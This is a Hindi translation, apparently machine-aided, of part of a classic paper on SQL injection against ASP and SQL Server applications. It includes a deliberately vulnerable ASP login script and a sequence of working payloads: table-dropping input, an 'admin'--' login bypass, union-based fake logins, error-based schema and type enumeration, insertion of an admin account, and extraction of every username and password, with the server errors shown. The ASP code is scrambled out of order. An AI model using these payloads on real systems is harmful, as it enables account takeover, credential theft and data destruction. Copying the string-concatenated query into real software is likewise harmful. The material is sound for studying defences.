SQL अनुप्रयोगों में मूल sql इंजेक्शन। डमीज़ के लिए गाइड

अनुवादक का नोट

यह काम क्रिस एनले एडवांस्ड एसक्यूएल इंजेक्शन इन एसक्यूएल सर्वर एप्लिकेशन के काम का एक हिस्सा है । ( डायरेक्ट डाउनलोड लिंक )
बाद के लेखों में, यदि खाली समय है, तो इस हस्तांतरण को अंतिम रूप दिया जाएगा।

पीएस अनुवाद शैक्षिक और ऐतिहासिक उद्देश्यों के लिए अधिक दिलचस्प होगा।

लेख का मूल शीर्षक: SQL भाषा का उपयोग करते हुए अनुप्रयोगों में उन्नत SQL इंजेक्शन।

अमूर्त

यह आलेख प्रसिद्ध Microsoft इंटरनेट सूचना सर्वर / सक्रिय सर्वर पृष्ठ / SQL सर्वर प्लेटफॉर्म के लिए "SQL इंजेक्शन" के सामान्य तरीकों का विवरण देता है। यह अनुप्रयोगों में SQL इंजेक्शन के विभिन्न उपयोगों पर चर्चा करता है और डेटा सत्यापन विधियों के साथ-साथ उन डेटाबेसों की सुरक्षा के बारे में बताता है जिनमें इंजेक्शन का उपयोग किया जा सकता है।

परिचय

संरचित क्वेरी भाषा (एसक्यूएल) एक संरचित भाषा है जिसका उपयोग डेटाबेस के साथ बातचीत करने के लिए किया जाता है। SQL भाषा की कई "बोलियाँ" हैं, लेकिन आज, मूल रूप से, वे सभी SQL-92 मानक, जल्द से जल्द ANSI मानकों में से एक के आधार पर बनाई गई हैं। मुख्य SQL ऑपरेशन ब्लॉक एक क्वेरी है, जो अभिव्यक्ति का एक संग्रह है जो आमतौर पर परिणाम (परिणाम सेट) का एक संग्रह लौटाता है। SQL अभिव्यक्तियाँ डेटाबेस की संरचना को बदल सकती हैं (डेटा परिभाषा भाषाओं के अभिव्यक्ति का उपयोग कर - DLL) और उनकी सामग्री का प्रबंधन (डेटा हेरफेर भाषाओं - डीएमएल के भावों का उपयोग करके)। इस पत्र में, हम ट्रांसेक्ट-एसक्यूएल को देखेंगे, जिसका उपयोग माइक्रोसॉफ्ट एसक्यूएल सर्वर में किया जाता है।

SQL इंजेक्शन तब संभव होता है जब कोई हमलावर अपने SQL कोड को क्वेरी में उस डेटा को नियंत्रित करने के लिए एक क्वेरी में पेस्ट कर सकता है जिसे एप्लिकेशन को भेजा जाता है।

एक नियमित SQL स्टेटमेंट इस तरह दिखता है:

select id, forename, surname from authors 

यह अभिव्यक्ति "लेखक" तालिका के कॉलम से "आईडी", "फॉरनाम" और "उपनाम" लेती है और तालिका में सभी पंक्तियों को वापस करती है। उदाहरण के लिए चयन एक विशिष्ट "लेखक" द्वारा सीमित किया जा सकता है:

 select id, forename, surname from authors where forename = 'john' and surname = 'smith' 

यह ध्यान दिया जाना चाहिए कि इस क्वेरी में स्ट्रिंग शाब्दिक को एक एकल उद्धरण द्वारा अलग किया जाता है। यह माना जाता है कि "forename" और "surrname" उपयोगकर्ता इनपुट हैं। इस मामले में, हमलावर अपने स्वयं के मूल्यों को एप्लिकेशन में जोड़कर अपनी SQL क्वेरी बना सकेगा। उदाहरण के लिए:

 <source lang="html"> Forename: jo'hn Surname: smith 

तब अभिव्यक्ति निम्नलिखित रूप लेगी:

 select id, forename, surname from authors where forename = 'jo'hn' and surname = 'smith' 

डेटाबेस ऐसे अनुरोध को संसाधित करने का प्रयास करने के बाद, निम्न त्रुटि वापस आ जाएगी:

 Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'hn'. 

त्रुटि का कारण यह होगा कि दर्ज किया गया एकल उद्धरण अनुरोध में सीमांकक संरचना को बर्बाद कर देगा। इस प्रकार, डेटाबेस hn कमांड को निष्पादित करने का असफल प्रयास करेगा, जिसके परिणामस्वरूप त्रुटि होगी। परिणामस्वरूप, यदि हमलावर फार्म में निम्नलिखित जानकारी दर्ज करता है:

 Forename: jo'; drop table authors-- Surname: 

तालिका "लेखक" हटा दी जाएगी; ऐसा क्यों होता है हम बाद में विचार करेंगे।

यह आपको प्रतीत हो सकता है कि यदि हम एकल उद्धरणों को इनपुट फ़ॉर्म से हटाते हैं और उन्हें "प्रतिस्थापित" भी करते हैं, तो इससे हमारी समस्या हल हो सकती है। और आप सही होंगे, हालांकि, इस समस्या के समाधान के रूप में इस पद्धति का उपयोग करने में कुछ समस्याएं हैं। सबसे पहले, सभी उपयोगकर्ता इनपुट "स्ट्रिंग्स" नहीं हैं। यदि उपयोगकर्ता फॉर्म में लेखक की "आईडी" होगी, जो आमतौर पर एक संख्या होती है। उदाहरण के लिए, हमारी क्वेरी इस तरह दिख सकती है:

 select id, forename, surname from authors where id=1234 

इस मामले में, पटाखा संख्यात्मक डेटा के बाद किसी भी एसक्यूएल अभिव्यक्ति को स्वतंत्र रूप से जोड़ने में सक्षम होगा। SQL प्रश्नों की अन्य किस्मों में, विभिन्न सीमांकक का उपयोग किया जाता है। उदाहरण के लिए, Microsoft Jet DBMS में, सीमांकक "#" वर्ण होगा। दूसरे, "बचना" सिंगल कोट्स की रक्षा के लिए सबसे आसान तरीका नहीं है, क्योंकि यह पहले लग सकता है। हम इस बारे में बाद में बात करेंगे।

यहां एक सक्रिय सर्वर पेज (ASP) आधारित लॉग इन पेज पर आधारित एक उदाहरण है जो किसी एप्लिकेशन में उपयोगकर्ता को अधिकृत करने के लिए SQL का उपयोग करके डेटाबेस तक पहुंचता है।

यहां लॉगिन फॉर्म वाले पेज का कोड है जिसमें उपयोगकर्ता नाम और पासवर्ड दर्ज किया गया है।

 <HTML> <HEAD> <TITLE>Login Page</TITLE> </HEAD> <BODY bgcolor='000000' text='cccccc'> <FONT Face='tahoma' color='cccccc'> <CENTER><H1>Login</H1> <FORM action='process_login.asp' method=post> <TABLE> <TR><TD>Username:</TD><TD><INPUT type=text name=username size=100% width=100></INPUT></TD></TR> <TR><TD>Password:</TD><TD><INPUT type=password name=password size=100% width=100></INPUT></TD></TR> </TABLE> <INPUT type=submit value='Submit'> <INPUT type=reset value='Reset'> </FORM> </FONT> </BODY> </HTML> 

नीचे कोड (process_login.asp) है जो दर्ज किए गए डेटा की शुद्धता को निर्धारित करता है।

 <HTML> <BODY bgcolor='000000' text='ffffff'> <FONT Face='tahoma' color='ffffff'> <STYLE> p { font-size=20pt ! important} font { font-size=20pt ! important} h1 { font-size=64pt ! important} </STYLE> </script> <script> <%@LANGUAGE = JScript %> <% function trace( str ) { if( Request.form("debug") == "true" ) Response.write( str ); } function Login( cn ){ var username; var password; username = Request.form("username"); password = Request.form("password"); var rso = Server.CreateObject("ADODB.Recordset"); var sql = "select * from users where username = '" + username + "' and password = '" + password + "'"; trace( "query: " + sql ); rso.open( sql, cn ); %> if (rso.EOF) { rso.close(); 

 <FONT Face='tahoma' color='cc0000'> <H1> <CENTER>ACCESS DENIED</CENTER> </H1> </BODY> </HTML> } else{ %> <% } Response.end return; Session("username") = "" + rso("username"); <FONT Face='tahoma' color='00cc00'> <H1> <CENTER>ACCESS GRANTED 

 Welcome, Response.write(rso("Username")); Response.write( "</BODY></HTML>" ); Response.end } function Main() { //Set up connection var username var cn = Server.createobject( "ADODB.Connection" ); cn.connectiontimeout = 20; cn.open( "localserver", "sa", "password" ); username = new String( Request.form("username") ); if( username.length > 0) { Login( cn ); } } cn.close(); Main(); %> 

भेद्यता "process_login.asp" में निहित है, जो निम्नलिखित फॉर्म का अनुरोध बनाता है:

 var sql = "select * from users where username = '" + username + "' and password = '" + password + "'"; 

यदि उपयोगकर्ता प्रवेश करता है:

 Username: '; drop table users-- Password: 

"उपयोगकर्ता" तालिका को हटा दिया जाएगा, जो सभी उपयोगकर्ताओं के लिए एप्लिकेशन तक पहुंच को रोक देगा। Transact-SQL में "-" का संयोजन एकल-पंक्ति टिप्पणी को परिभाषित करता है, और ";" एक पंक्ति के अंत और दूसरे की शुरुआत को इंगित करता है। इस अनुरोध में दो लगातार डैश त्रुटियों के बिना अनुरोध को पूरा करने के लिए उपयोग किए जाते हैं।

इसके अलावा, एक हमलावर निम्नलिखित निर्माण का उपयोग करके किसी भी उपयोगकर्ता नाम के तहत सिस्टम में लॉग इन कर सकता है:

 Username: admin'-- 

निम्नलिखित जानकारी दर्ज करके, पटाखा एक काल्पनिक उपयोगकर्ता के रूप में सिस्टम में प्रवेश कर सकेगा:

 Username: ' union select 1, 'fictional_user', 'some_password', 1-- 

इस पद्धति के संचालन का कारण यह है कि आवेदन "विश्वास" करेगा कि लौटाया गया डमी परिणाम डेटाबेस से रिकॉर्ड का एक सेट है।

त्रुटि संदेशों के आधार पर जानकारी प्राप्त करना

इस तकनीक के आविष्कारक डेविड लिचफील्ड हैं, जो पैठ परीक्षण (सुरक्षा प्रणाली का परीक्षण करने) के क्षेत्र में एक शोधकर्ता हैं। डेविड ने बाद में इस विषय पर एक काम लिखा [1], जिसे कई अन्य लेखकों द्वारा उद्धृत किया गया था। उनका काम त्रुटि संदेशों का उपयोग करने के लिए तंत्र की व्याख्या करता है - "त्रुटि संदेश" तकनीक। अपने काम में, वह इस तकनीक को पूरी तरह से पाठकों को समझाते हैं, और इस समस्या की अपनी समझ के विकास के लिए एक और प्रेरणा देते हैं।

सफल डेटा प्रबंधन के लिए, एक हमलावर को डेटाबेस और तालिकाओं की संरचना को जानना चाहिए जो वह एक्सेस करना चाहता है। उदाहरण के लिए, हमारे "उपयोगकर्ताओं" की तालिका निम्न कमांड का उपयोग करके बनाई गई थी:

 create table users( id int, username varchar(255), password varchar(255), privs int ) 

और निम्नलिखित उपयोगकर्ता शामिल हैं:

 insert into users values( 0, 'admin', 'r00tr0x!', 0xffff ) insert into users values( 0, 'guest', 'guest', 0x0000 ) insert into users values( 0, 'chris', 'password', 0x00ff ) insert into users values( 0, 'fred', 'sesame', 0x00ff ) 

मान लीजिए कि हमारा हैकर मेज पर अपना रिकॉर्ड डालना चाहता है। यह संभावना नहीं है कि वह सफल होगा यदि वह इसकी संरचना को नहीं जानता है। लेकिन अगर वह सफल हो जाता है, तो भी निजी क्षेत्र का मूल्य समझ से बाहर रहेगा। एक हमलावर कम विशेषाधिकारों के साथ एक खाता बनाकर "1" का मान डाल सकता है, जबकि उसे आवेदन के प्रशासक स्तर पर पहुंच की आवश्यकता होती है।

सौभाग्य से, एक हैकर के लिए, त्रुटियों पर एएसपी का मानक व्यवहार उनके बारे में संदेश प्रदर्शित करना है, उनकी मदद से डेटाबेस संरचना को पूरी तरह से निर्धारित किया जाता है, और इसलिए अनुप्रयोग डेटाबेस में सूचीबद्ध उपयोगकर्ता खातों से सभी क्षेत्रों के मूल्यों का पता लगाना है।

(निम्नलिखित उदाहरण में, हम ऊपर प्रस्तावित डेटाबेस, साथ ही एक एस्प स्क्रिप्ट का उपयोग करेंगे, ताकि इस तकनीक को कार्रवाई में दिखाया जा सके।)

सबसे पहले, हमलावर उन तालिकाओं के नाम सेट करना चाहेगा जिनके साथ क्वेरीज़ काम करती हैं, साथ ही साथ फ़ील्ड्स के नाम भी। इस लक्ष्य को प्राप्त करने के लिए, हमलावर चुनिंदा अभिव्यक्ति में "होने" के निर्माण का उपयोग करेगा:

 Username: ' having 1=1-- 

जो निम्न त्रुटि का कारण होगा:

 Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /process_login.asp, line 35 

इस प्रकार, तालिकाओं के नाम और उसमें पहले कॉलम के नाम को जानना। इस प्रक्रिया को "समूह द्वारा" ऑपरेटर का उपयोग करके जारी रखा जा सकता है, जैसा कि नीचे दिखाया गया है:

 Username: ' group by users.id having 1=1-- 

(जो बदले में एक नई त्रुटि उत्पन्न करेगा)

 Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /process_login.asp, line 35 

परिणामस्वरूप, हैकर निम्नलिखित डिज़ाइन में आएगा:

 ' group by users.id, users.username, users.password, users.privs having 1=1-- 

जो एक त्रुटि का कारण नहीं होगा और इसके बराबर होगा:

 select * from users where username = '' 

इस प्रकार, हमलावर सीखता है कि अनुरोध केवल उपयोगकर्ता तालिका को प्रभावित करता है, जिसकी संरचना 'आईडी, उपयोगकर्ता नाम, पासवर्ड, निजी' (उस क्रम में) है।

उपयोगी जानकारी यदि आप पता कर सकते हैं कि प्रत्येक कॉलम में किस प्रकार का डेटा उपयोग किया गया है। उदाहरण के लिए, "प्रकार रूपांतरण" का उपयोग करके डेटा प्रकार के बारे में जानकारी प्राप्त की जा सकती है:

 Username: ' union select sum(username) from users-- 

योग () का अर्थ यह है कि SQL सर्वर यह निर्धारित करने से पहले इसे निष्पादित करने की कोशिश करता है कि क्या मूल्य संख्यात्मक या वर्ण है। पाठ फ़ील्ड के "योग" की गणना करने का प्रयास करने के परिणामस्वरूप निम्न त्रुटि होगी:

 Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument. /process_login.asp, line 35 

जो हमें बताता है कि उपयोगकर्ता नाम फ़ील्ड में डेटा प्रकार varchar है। दूसरी ओर, यदि हम संख्यात्मक प्रकार के योग () की गणना करने का प्रयास करते हैं, तो हमें एक संदेश मिलता है कि दो पाठ लाइनों के सेट में वर्णों की संख्या मेल नहीं खाती है:

 Username: ' union select sum(id) from users-- Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists. /process_login.asp, line 35 

डेटाबेस में स्थित किसी भी कॉलम, लगभग किसी भी कॉलम के डेटा प्रकार को निर्धारित करने के लिए हम एक समान तकनीक का उपयोग कर सकते हैं।

बदले में, हमलावर को एक अच्छी तरह से तैयार किए गए "इन्सर्ट" अनुरोध को बनाने में मदद करेगा, उदाहरण के लिए:

 Username: '; insert into users values( 666, 'attacker', 'foobar', 0xffff )-- 

हालांकि, एल्गोरिथ्म की संभावना के लिए, यह वहाँ समाप्त नहीं होता है। एक हैकर पर्यावरण या डेटाबेस के बारे में त्रुटियों से उपयोगी जानकारी प्राप्त कर सकता है। मानक त्रुटियों की सूची निर्माण का उपयोग करके प्राप्त की जा सकती है:

 select * from master..sysmessages 

इस अनुरोध को पूरा करके, आप बहुत सी रोचक जानकारी प्राप्त कर सकते हैं।

टाइप रूपांतरण जानकारी विशेष रूप से उपयोगी है। यदि आप स्ट्रिंग को पूर्णांक में बदलने का प्रयास करते हैं, तो सभी स्ट्रिंग सामग्री वाला संदेश वापस आ जाएगा। हमारे उदाहरण में, उपयोगकर्ता नाम एसक्यूएल सर्वर के संस्करण, साथ ही साथ ऑपरेटिंग सिस्टम के संस्करण को लौटाएगा।

 Username: ' union select @@version,1,1,1-- Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ' to a column of data type int. /process_login.asp, line 35 

उपरोक्त उदाहरण में, हम अंतर्निहित स्थिर को बदलने की कोशिश करेंगे

 '@@version' 

पूर्णांक मान में, चूंकि उपयोगकर्ता तालिका के पहले कॉलम में यह डेटा प्रकार है।

डेटाबेस में किसी भी तालिका में किसी भी मूल्य को पढ़ने के लिए विधि का उपयोग किया जा सकता है। इस प्रकार, यदि कोई हमलावर उपयोगकर्ता के नाम और पासवर्ड जानना चाहता है, तो सबसे अधिक संभावना है कि वह डेटा पढ़ने के लिए निम्न निर्माण का उपयोग करेगा:

 Username: ' union select min(username),1,1,1 from users where username > 'a'-- 

ऐसे उपयोगकर्ता का चयन करना जिसका "उपयोगकर्ता नाम" "a" से अधिक है, प्रकारों को पूर्णांक मान में बदलने का प्रयास करेंगे:

 Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin' to a column of data type int. /process_login.asp, line 35 

इस प्रकार, हमें उपयोगकर्ताओं की एक सूची मिलती है, जिसके बाद हम पासवर्ड प्राप्त करने के लिए आगे बढ़ सकते हैं:

 Username: ' union select password,1,1,1 from users where username = 'admin'-- Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'r00tr0x!' to a column of data type int. /process_login.asp, line 35 

एक अधिक सुंदर तरीका यह है कि एक चयन में सभी उपयोगकर्ता नाम और पासवर्ड का चयन करें, और फिर उन्हें पूर्णांक मान में बदलने का प्रयास करें। यह ध्यान दिया जाना चाहिए कि लेनदेन-एसक्यूएल अभिव्यक्तियों को एक पंक्ति में उनके अर्थ को बदलने के बिना एक साथ एकत्र किया जा सकता है - निम्नलिखित उदाहरण पर विचार करें:

 begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username>@ret select @ret as ret into foo end 

यह स्पष्ट है कि हमलावर इस उपयोगकर्ता नाम के साथ "लॉग इन" करेगा:

 Username: '; begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username>@ret select @ret as ret into foo end-- 

यह क्वेरी एक टेबल फू बनायेगी जिसमें एक "रिट" कॉलम होगा, जिसमें हमारी सभी पंक्तियाँ स्थित होंगी। अक्सर, यहां तक ​​कि कम विशेषाधिकार वाले उपयोगकर्ता के पास डेटाबेस में एक तालिका बनाने की क्षमता होती है, या एक अस्थायी डेटाबेस भी होता है।

एक हमलावर इस प्रकार इस तालिका से सभी पंक्तियों का चयन कर सकता है, जैसा कि पिछले उदाहरण में है:

 Username: ' union select ret,1,1,1 from foo-- Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': admin/r00tr0x! guest/guest chris/password fred/sesame' to a column of data type int. /process_login.asp, line 35 

और इसके बाद यह निशान हटाएगा, तालिका को हटा रहा है:

 Username: '; drop table foo-- 

उपरोक्त उदाहरण इस एल्गोरिथ्म द्वारा दिए गए सभी लचीलेपन को दर्शाते हैं। यह कहने की आवश्यकता नहीं है कि यदि कोई डेटाबेस का उपयोग करते समय त्रुटि का कारण बनता है, तो उनका काम बहुत सरल हो जाता है।